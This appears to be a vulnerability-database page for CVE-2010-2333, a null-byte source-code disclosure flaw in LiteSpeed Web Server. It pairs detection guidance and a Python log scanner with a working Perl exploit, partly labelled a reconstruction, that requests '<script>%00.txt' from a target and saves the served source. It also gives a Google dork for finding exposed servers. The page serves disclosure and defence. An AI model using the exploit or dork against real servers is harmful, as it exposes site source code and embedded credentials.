CVE-2010-2333
Published 2010-06-18
Priority: P3 (50) · Severity: medium · CVSS 2.0 base score: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: public exploit available
EPSS: 60.20% (99.0th percentile)
LiteSpeed Technologies LiteSpeed Web Server 4.0.x before 4.0.15 allows remote attackers to read the source code of scripts via an HTTP request with a null byte followed by a .txt file extension.
Affected
15 ranges (the listing captured only the vendor and product; the individual version ranges and fixed-in versions were not extracted)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| litespeedtech | litespeed_web_server | 4.0.x before 4.0.15 (per the description; the 15 individual ranges are not shown) | 4.0.15 |
Detection & IOCs (extracted from sources)
- Flag requests to servers whose Server header identifies as LiteSpeed where the request URI contains a null byte (raw, or URL-encoded as %00); the public exploit checks for the string 'LiteSpeed' in the response's Server header to confirm the target before sending the poisoned request.
- The Google dork "Proudly Served by LiteSpeed Web Server" identifies exposed LiteSpeed instances that may be vulnerable to this CVE.
- A Metasploit auxiliary module scans for the source-code disclosure in LiteSpeed versions 4.0.14 and prior.
- The vulnerability lets an attacker read script source (e.g. PHP files) via a null-byte-poisoned URI of the form <script path>%00.txt; monitor for requests to known script paths that carry a null byte followed by a .txt suffix, and treat a 200 response to such a request as confirmation that source was served.
- The vulnerability is version-scoped: only LiteSpeed Web Server 4.0.x before 4.0.15 is affected; 4.0.15 and later are not vulnerable.
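The detection points above, worked through as an added Python example that is not part of this page, of LiteSpeed, or of the exploit authors' code: it parses constructed access-log lines, flags request paths that carry a null byte after one round of URL-decoding, singles out the exact <script>%00.txt form from the advisory, and applies the version gate. The log lines, the SCRIPT_EXTS list and all function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format (the format
# LiteSpeed writes by default). Made up for this example, not captured traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jun/2010:00:10:38 +0000] "GET /index.php HTTP/1.0" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jun/2010:00:10:39 +0000] "GET /config.php%00.txt HTTP/1.0" 200 812 "-" "-"
198.51.100.4 - - [13/Jun/2010:00:11:02 +0000] "GET /readme.txt HTTP/1.1" 200 300 "-" "curl/7.19.7"
198.51.100.4 - - [13/Jun/2010:00:11:05 +0000] "GET /admin/db.inc.php%00 HTTP/1.1" 404 211 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Assumption: extensions the server hands to a script engine instead of
# serving verbatim. Adjust to the deployment.
SCRIPT_EXTS = ('.php', '.pl', '.cgi', '.py', '.rb')


def split_null_byte(uri):
    """Return (path_before_nul, tail_after_nul) if the request path contains a
    null byte after one round of URL-decoding, else None.

    One decoding pass mirrors the server: '%2500' decodes to the literal text
    '%00', which is not a null byte and is not flagged.
    """
    path = uri.split('?', 1)[0]
    decoded = unquote(path)
    if '\x00' not in decoded:
        return None
    before, _, after = decoded.partition('\x00')
    return before, after


def is_txt_poison(uri):
    """True for the exact pattern in the advisory: <script>%00.txt."""
    parts = split_null_byte(uri)
    return (parts is not None
            and parts[1].lower() == '.txt'
            and parts[0].lower().endswith(SCRIPT_EXTS))


def scan_access_log(text):
    """Return one record per request whose path carries a null byte."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = split_null_byte(m['uri'])
        if parts is None:
            continue
        hits.append({
            'ip': m['ip'],
            'uri': m['uri'],
            'script': parts[0],
            'suffix': parts[1],
            'status': int(m['status']),
            # A 200 on the poisoned request means the script was served as
            # plain text; a patched server refuses the request.
            'source_served': is_txt_poison(m['uri']) and m['status'] == '200',
        })
    return hits


def is_affected_version(version):
    """Version gate from the advisory: LiteSpeed Web Server 4.0.x before 4.0.15."""
    parts = [int(p) for p in version.split('.')]
    parts += [0] * (3 - len(parts))
    return parts[0] == 4 and parts[1] == 0 and parts[2] < 15


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The scanner assumes the access log records the URI as the client sent it, percent-encoded; a request line carrying a raw 0x00 byte may be logged in whatever escaped form the server uses for non-printable bytes, so extend split_null_byte to that form before relying on it against real logs.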
No detection rules found.
Exploit-DB
Litespeed Technologies - Web Server Remote Poison Null Byte
exploitdb · 2010-06-13
---
Litespeed Technologies Web Server Remote Poison null byte Zero-Day
discovered and exploited by Kingcope in June 2010
Google gives me over 9 million hits
Example exploit session:
```
%nc 192.168.2.19 80
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Sun, 13 Jun 2010 00:10:38 GMT
Server: LiteSpeed .
%cat 192.168.2.19-config.php
%
```
Exploit:
```perl
#!/usr/bin/perl
#
#LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day Exploit
#By Kingcope
#Google search: "Proudly Served by LiteSpeed Web Server"
#June 2010
#Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556
#
use IO::Socket;
use strict;
sub getphpsrc {
	my $host = shift;
	my $file = shift;
	if (substr($file, 0, 1) eq "/") {
		$file = substr($file, 1);
	}
	# The page's listing stops above. What follows is a reconstruction of the documented
	# behaviour (request "/<script>\0.txt", save the body as "<host>-<script>"), not Kingcope's lines.
	my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => 'tcp')
		or die "connect to $host:80 failed: $!";
	# NUL ends the name seen by the script handler; ".txt" makes LiteSpeed serve it as plain text
	print $sock "GET /$file\x00.txt HTTP/1.0\r\nHost: $host\r\n\r\n";
	my $resp = do { local $/; <$sock> };
	close $sock;
	my ($body) = $resp =~ /\r\n\r\n(.*)\z/s;
	(my $out = "$host-$file") =~ s{/}{_}g;
	open(my $fh, '>', $out) or die "cannot write $out: $!";
	print $fh $body;
	close $fh;
}
die "usage: $0 <host> <script path>\n" unless @ARGV == 2;
getphpsrc(@ARGV);
```
Metasploit
LiteSpeed Source Code Disclosure/Download
This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed.
No writeups or analysis indexed.
References
- http://osvdb.org/65476
- http://seclists.org/fulldisclosure/2010/Jun/288
- http://secunia.com/advisories/40128
- http://www.exploit-db.com/exploits/13850
- http://www.litespeedtech.com/latest/litespeed-web-server-4.0.15-released.html
- http://www.litespeedtech.com/support/forum/showthread.php?t=4078
- http://www.securityfocus.com/bid/40815